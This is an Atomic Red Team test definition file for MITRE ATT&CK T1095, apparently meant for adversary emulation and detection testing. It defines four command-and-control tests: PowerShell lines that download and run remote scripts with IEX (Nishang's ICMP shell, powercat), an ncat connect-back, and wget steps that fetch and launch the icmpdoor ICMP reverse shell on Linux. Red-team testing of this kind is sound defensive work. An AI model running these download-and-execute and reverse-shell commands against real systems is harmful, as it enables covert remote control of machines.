security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1095/T1095.yaml
T
Atomic Red Team doc generator c313a5a937 Generated docs from job=generate-docs branch=master [ci skip]
2025-02-25 04:35:21 +00:00

120 lines
5.3 KiB
YAML
Raw Permalink Blame History

attack_technique: T1095
display_name: Non-Application Layer Protocol
atomic_tests:
- name: ICMP C2
auto_generated_guid: 0268e63c-e244-42db-bef7-72a9e59fc1fc
description: |
This will attempt to start C2 Session Using ICMP. For information on how to set up the listener
refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/
supported_platforms:
- windows
input_arguments:
server_ip:
description: The IP address of the listening server
type: string
default: 127.0.0.1
executor:
command: |
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress #{server_ip}
name: powershell
- name: Netcat C2
auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37
description: |
Start C2 Session Using Ncat
To start the listener on a Linux device, type the following:
nc -l -p <port>
supported_platforms:
- windows
input_arguments:
server_port:
description: The port for the C2 connection
type: integer
default: 80
ncat_exe:
description: The location of ncat.exe
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\T1095\nmap-7.80\ncat.exe
ncat_path:
description: The folder path of ncat.exe
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\T1095
server_ip:
description: The IP address or domain name of the listening server
type: string
default: 127.0.0.1
dependency_executor_name: powershell
dependencies:
- description: |
ncat.exe must be available at specified location (#{ncat_exe})
prereq_command: |
if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path "#{ncat_path}" | Out-Null
$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip"
Invoke-WebRequest "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force
$unzipPath = Join-Path $parentPath "nmap-7.80"
if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) {
Start-Process (Join-Path $unzipPath "vcredist_x86.exe")
}
executor:
command: |
cmd /c "#{ncat_exe}" #{server_ip} #{server_port}
name: powershell
- name: Powercat C2
auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e
description: |
Start C2 Session Using Powercat
To start the listener on a Linux device, type the following:
nc -l -p <port>
supported_platforms:
- windows
input_arguments:
server_ip:
description: The IP address or domain name of the listening server
type: string
default: 127.0.0.1
server_port:
description: The port for the C2 connection
type: integer
default: 80
executor:
command: |
IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c #{server_ip} -p #{server_port}
name: powershell
- name: Linux ICMP Reverse Shell using icmp-cnc
auto_generated_guid: 8e139e1f-1f3a-4be7-901d-afae9738c064
description: |
ICMP C2 (Command and Control) utilizes the Internet Control Message Protocol (ICMP), traditionally used for network diagnostics, as a covert communication channel for attackers. By using ICMP, adversaries can send commands, exfiltrate data, or maintain access to compromised systems without triggering network detection systems.
This method allows attackers to communicate and control compromised devices while remaining undetected.
For more details, check this blog: [ICMP Reverse Shell Blog](https://cryptsus.com/blog/icmp-reverse-shell.html)
**Important Notes:**
- Use `[icmp-cnc]` for the C2 server (Attacker) and `[icmpdoor]` for the C2 client (Victim).
- Binaries work on Ubuntu 22.04.5 LTS; for CentOS Stream or other, use the Python file from the GitHub link [https://github.com/krabelize/icmpdoor].
- Root access is required.
supported_platforms:
- linux
executor:
steps: |
1. Run the following command on both the attacker and victim machines to download the required binaries.
mkdir -p /tmp/icmpdoor && wget -P /tmp/icmpdoor https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmp-cnc https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmpdoor && chmod +x /tmp/icmpdoor/icmp-cnc /tmp/icmpdoor/icmpdoor && echo 'export PATH=$PATH:/tmp/icmpdoor' >> ~/.bashrc && source ~/.bashrc
2. Start the C2 server on the attacker system to listen for incoming connections.
icmp-cnc --interface <Network Interface> --destination_ip <VICTIM-IP>
3. Run the client on the victim machine.
icmpdoor --interface <Network Interface> --destination_ip <ATTACKER-IP>
4. Cleanup Command: Remove the icmpdoor directory.
rm -rf /tmp/icmpdoor
name: manual
Reference in New Issue View Git Blame Copy Permalink